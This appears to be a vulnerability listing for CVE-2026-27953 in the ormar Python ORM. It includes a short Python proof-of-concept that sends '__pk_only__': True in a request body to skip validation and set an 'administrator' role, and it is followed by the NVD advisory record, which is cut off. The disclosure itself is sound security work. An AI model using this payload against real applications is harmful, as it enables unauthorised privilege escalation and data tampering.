CVE-2026-27953

import requests def exploit_poc(): target_url = "http://vulnerable-app/api/users" # Malicious payload to bypass Pydantic validation # Assuming the endpoint expects a User model with validation on 'email' and 'role' payload = { "username": "hacker", "email": "invalid-email-format", # Normally would fail validation "role": "administrator", # Normally restricted "__pk_only__": True # Bypass parameter } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Exploit successful! Data persisted without validation.") else: print(f"[-] Request failed with status: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": exploit_poc()

{"cve": {"id": "CVE-2026-27953", "sourceIdentifier": "[email protected]", "published": "2026-03-19T21:17:09.573", "lastModified": "2026-03-27T21:48:05.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1."}, {"lang": "es", "value": "ormar es un mini ORM asíncrono para Python. Las versiones 0.23.0 e inferiores son vulnerables a un bypass de validación de Pydantic a través del constructor del modelo, permitiendo a cualquier usuario no autenticado omitir toda la validación de campos inyectando '__pk_only__': true en un cuerpo de solicitud JSON. Al inyectar '__pk_only__': true en un cuerpo de solicitud JSON, un atacante no autenticado puede omitir toda la validación de campos y persistir datos no validados directamente en la base de datos. Una inyección de parámetro secundaria __excluded__ utiliza el mismo patrón para anular selectivamente campos de modelo arbitrarios (p. ej., correo electrónico o rol) durante la construcción. Esto afecta el patrón canónico de integración de FastAPI de ormar recomendado en su documentación oficial, permitiendo la escalada de privilegios, violaciones de integridad de datos y bypass de lógica de negocio en cualquier aplicación que utilice ormar.Model directamente como parámetro del cuerpo de la solicitud. Este problema ha sido solucionado en la versión 0.23.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:collerek:ormar:*:*:*:*:*:python:*:*", "versionEndExcluding": "0.23.1", "matchCriteriaId": "28060AA9-6E58-42EE-9043-CC3998D6B0ED"}]}]}], "references": [{"url": "https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ormar-orm/ormar/releases/tag/0.23.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8", "so ... (truncated)